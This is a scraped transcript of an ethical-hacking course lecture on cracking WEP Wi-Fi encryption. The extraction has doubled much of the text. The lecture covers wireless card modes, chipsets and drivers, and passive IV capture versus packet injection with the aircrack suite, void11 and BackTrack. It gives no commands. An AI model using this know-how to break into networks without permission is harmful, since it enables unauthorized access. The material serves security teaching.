l14 more wireless hacking: cracking wired equivalent privacy (wep) it-slideshares.blogspot.com
Post on 02-Jul-2015
2.466 Views
Preview:
DESCRIPTION
TRANSCRIPT
Hands-On Ethical Hands-On Ethical Hacking and Network Hacking and Network
DefenseDefense
Lecture 14Lecture 14Cracking WEPCracking WEP
Last modified 5-11-09
Legal ConcernsLegal Concerns Defeating security to enter a network Defeating security to enter a network
without permission is clearly illegalwithout permission is clearly illegal Even if the security is weakEven if the security is weak
Sniffing unencrypted wireless traffic may Sniffing unencrypted wireless traffic may also be illegalalso be illegal It could be regarded as an illegal wiretapIt could be regarded as an illegal wiretap The situation is unclear, and varies from state The situation is unclear, and varies from state
to stateto state In California, privacy concerns tend to In California, privacy concerns tend to
outweigh other considerationsoutweigh other considerations See links l14v, l14wSee links l14v, l14w
EquipmentEquipment
Wireless Network Interface Cards Wireless Network Interface Cards (NICs) and Drivers(NICs) and Drivers
The GoalThe Goal
All wireless NICs can connect to an All wireless NICs can connect to an Access PointAccess Point
But hacking requires more than that, But hacking requires more than that, because we need to dobecause we need to do Sniffing Sniffing – collecting traffic addressed to other – collecting traffic addressed to other
devicesdevices Injection Injection – transmitting forged packets which – transmitting forged packets which
will appear to be from other deviceswill appear to be from other devices
Windows v. LinuxWindows v. Linux
The best wireless hacking software is The best wireless hacking software is written in Linuxwritten in Linux The Windows tools are inferior, and don't The Windows tools are inferior, and don't
support packet injectionsupport packet injection
But all the wireless NICs are designed for But all the wireless NICs are designed for WindowsWindows And the drivers are written for WindowsAnd the drivers are written for Windows Linux drivers are hard to find and confusing to Linux drivers are hard to find and confusing to
install install
Wireless NIC ModesWireless NIC Modes
There are four modes a NIC can useThere are four modes a NIC can use Master modeMaster mode Managed modeManaged mode Ad-hoc modeAd-hoc mode Monitor modeMonitor mode
See link l_14jSee link l_14j
Master ModeMaster Mode
Master ModeMaster Mode Also called Also called AP AP or or Infrastructure modeInfrastructure mode Looks like an access pointLooks like an access point Creates a network withCreates a network with
A name (SSID)A name (SSID) A channelA channel
Managed ModeManaged Mode
Managed ModeManaged Mode Also called Also called Client modeClient mode The usual mode for a Wi-Fi laptopThe usual mode for a Wi-Fi laptop Joins a network created by a masterJoins a network created by a master Automatically changes channel to match the Automatically changes channel to match the
mastermaster Presents credentials, and if accepted, Presents credentials, and if accepted,
becomes becomes associated associated with the masterwith the master
Typical Wireless LANTypical Wireless LAN
Access Point in Master Mode
Clients in Managed
Mode
Ad-hoc ModeAd-hoc Mode
Nodes in Ad-hoc Mode
Peer-to-peer networkPeer-to-peer network No master or Access PointNo master or Access Point Nodes must agree on a channel and SSIDNodes must agree on a channel and SSID
Monitor ModeMonitor Mode
Does not associate with Access PointDoes not associate with Access Point Listens to trafficListens to traffic Like a wired NIC in Promiscuous ModeLike a wired NIC in Promiscuous Mode
Monitor Mode
Master Mode
ManagedMode
Wi-Fi NICsWi-Fi NICs
To connect to a Wi-Fi network, you need a To connect to a Wi-Fi network, you need a Network Interface Card (NIC)Network Interface Card (NIC)
The most common type is the PCMCIA The most common type is the PCMCIA cardcard Designed for laptop Designed for laptop
computerscomputers
USB and PCI Wi-Fi NICsUSB and PCI Wi-Fi NICs
USBUSB Can be used on a Can be used on a
laptop or desktop PClaptop or desktop PC
PCIPCI Installs inside a Installs inside a
desktop PCdesktop PC
Choosing a NICChoosing a NIC
For penetration testing (hacking), consider For penetration testing (hacking), consider these factors:these factors: ChipsetChipset Output powerOutput power Receiving sensitivityReceiving sensitivity External antenna connectorsExternal antenna connectors Support for 802.11i and improved WEP Support for 802.11i and improved WEP
versionsversions
Wi-Fi NIC ManufacturersWi-Fi NIC Manufacturers
Each wireless card has two manufacturersEach wireless card has two manufacturers The card itself is made by a company like The card itself is made by a company like
NetgearNetgear UbiquitiUbiquiti LinksysLinksys D-LinkD-Link many, many othersmany, many others
But the chipset (control circuitry) is made by a But the chipset (control circuitry) is made by a different companydifferent company
ChipsetsChipsets
To find out what chipset your card uses, To find out what chipset your card uses, you must search on the Webyou must search on the Web Card manufacturer's don't want you to knowCard manufacturer's don't want you to know
Major chipsets:Major chipsets: PrismPrism Cisco AironetCisco Aironet Hermes/OrinocoHermes/Orinoco AtherosAtheros
There are othersThere are others
Prism ChipsetPrism Chipset
Prism chipset is a favorite among hackersPrism chipset is a favorite among hackers Completely open -- specifications availableCompletely open -- specifications available Has more Linux drivers than any other chipsetHas more Linux drivers than any other chipset
See link l_14dSee link l_14d
Prism ChipsetPrism Chipset
Prism chipset is the best choice for Prism chipset is the best choice for penetration testingpenetration testing
HostAP Linux Drivers are highly HostAP Linux Drivers are highly recommended, supporting:recommended, supporting: NIC acting as an Access PointNIC acting as an Access Point Use of the iwconfig command to configure the Use of the iwconfig command to configure the
NICNIC See link l_14hSee link l_14h
Cisco Aironet ChipsetCisco Aironet Chipset
Cisco proprietary – not openCisco proprietary – not open Based on Prism, with more featuresBased on Prism, with more features
Regulated power outputRegulated power output Hardware-based channel-hoppingHardware-based channel-hopping
Very sensitive – good for wardrivingVery sensitive – good for wardriving Cannot use HostAP driversCannot use HostAP drivers Not useful for man-in-the-middle or other Not useful for man-in-the-middle or other
complex attackscomplex attacks
Hermes ChipsetHermes Chipset
Lucent proprietary – not openLucent proprietary – not open Lucent published some source code for Lucent published some source code for
WaveLAN/ORiNOCO cardsWaveLAN/ORiNOCO cards Useful for all penetration testing, but Useful for all penetration testing, but
requirerequire Shmoo driver patches (link l_14l) to use Shmoo driver patches (link l_14l) to use
monitor modemonitor mode
Atheros ChipsetAtheros Chipset
The most common chipset in 802.11a The most common chipset in 802.11a devicesdevices Best Atheros drivers are MadWIFI (link l_14m)Best Atheros drivers are MadWIFI (link l_14m) Some cards work better than othersSome cards work better than others Monitor mode is available, at least for some Monitor mode is available, at least for some
cardscards
Other CardsOther Cards
If all else fails, you could use Windows If all else fails, you could use Windows drivers with a wrapper to make them work drivers with a wrapper to make them work in Linuxin Linux DriverLoader (link l_14n)DriverLoader (link l_14n) NdisWrapper (link l_14o)NdisWrapper (link l_14o)
But all you'll get is basic functions, not But all you'll get is basic functions, not monitor mode or packet injectionmonitor mode or packet injection Not much use for hackingNot much use for hacking
Cracking WEPCracking WEP
Tools and PrinciplesTools and Principles
A Simple WEP CrackA Simple WEP Crack
The Access Point and Client are using The Access Point and Client are using WEP encryptionWEP encryption
The hacker device just listens The hacker device just listens
HackerListening
WEP-Protected
WLAN
Listening is SlowListening is Slow
You need to capture 50,000 to 200,000 You need to capture 50,000 to 200,000 "interesting" packets to crack a 64-bit "interesting" packets to crack a 64-bit WEP keyWEP key The "interesting" packets are the ones The "interesting" packets are the ones
containing Initialization Vectors (IVs)containing Initialization Vectors (IVs) Only about ¼ of the packets contain IVsOnly about ¼ of the packets contain IVs So you need 200,000 to 800,000 packetsSo you need 200,000 to 800,000 packets
It can take hours or days to capture that It can take hours or days to capture that many packetsmany packets
Packet InjectionPacket Injection
A second hacker machine A second hacker machine injects packets to create more injects packets to create more "interesting packet""interesting packet"
HackerListening
WEP-Protected
WLAN
HackerInjecting
Injection is MUCH FasterInjection is MUCH Faster
With packet injection, the listener can With packet injection, the listener can collect 200 IVs per secondcollect 200 IVs per second
5 – 10 minutes is usually enough to crack 5 – 10 minutes is usually enough to crack a 64-bit keya 64-bit key
Cracking a 128-bit key takes an hour or soCracking a 128-bit key takes an hour or so Link l_14rLink l_14r
AP & Client RequirementsAP & Client Requirements
Access PointAccess Point Any AP that supports WEP Any AP that supports WEP
should be fine (they all do)should be fine (they all do)
ClientClient Any computer with any Any computer with any
wireless card will dowireless card will do Could use Windows or LinuxCould use Windows or Linux
WEP-Protected
WLAN
Listener RequirementsListener Requirements
NIC must support Monitor ModeNIC must support Monitor Mode Could use Windows or LinuxCould use Windows or Linux
But you can't use NDISwrapperBut you can't use NDISwrapper SoftwareSoftware
Airodump (part of the Aircrack Suite) for Airodump (part of the Aircrack Suite) for Windows or Linux (see Link l_14q)Windows or Linux (see Link l_14q)
BackTrack is a live Linux CD with Aircrack on BackTrack is a live Linux CD with Aircrack on it (and many other hacking tools) it (and many other hacking tools) Link l_14nLink l_14n
HackerListening
Injector RequirementsInjector Requirements
NIC must support injectionNIC must support injection Must use LinuxMust use Linux SoftwareSoftware
void11 and aireplayvoid11 and aireplay Link l_14qLink l_14q
HackerInjecting
Sources Sources
Aircrack-ng.org (link l_14a)Aircrack-ng.org (link l_14a) Wi-Foo (link l_14c)Wi-Foo (link l_14c) Vias.org (link l_14j)Vias.org (link l_14j) smallnetbuilder.com (link l_14p)smallnetbuilder.com (link l_14p)
top related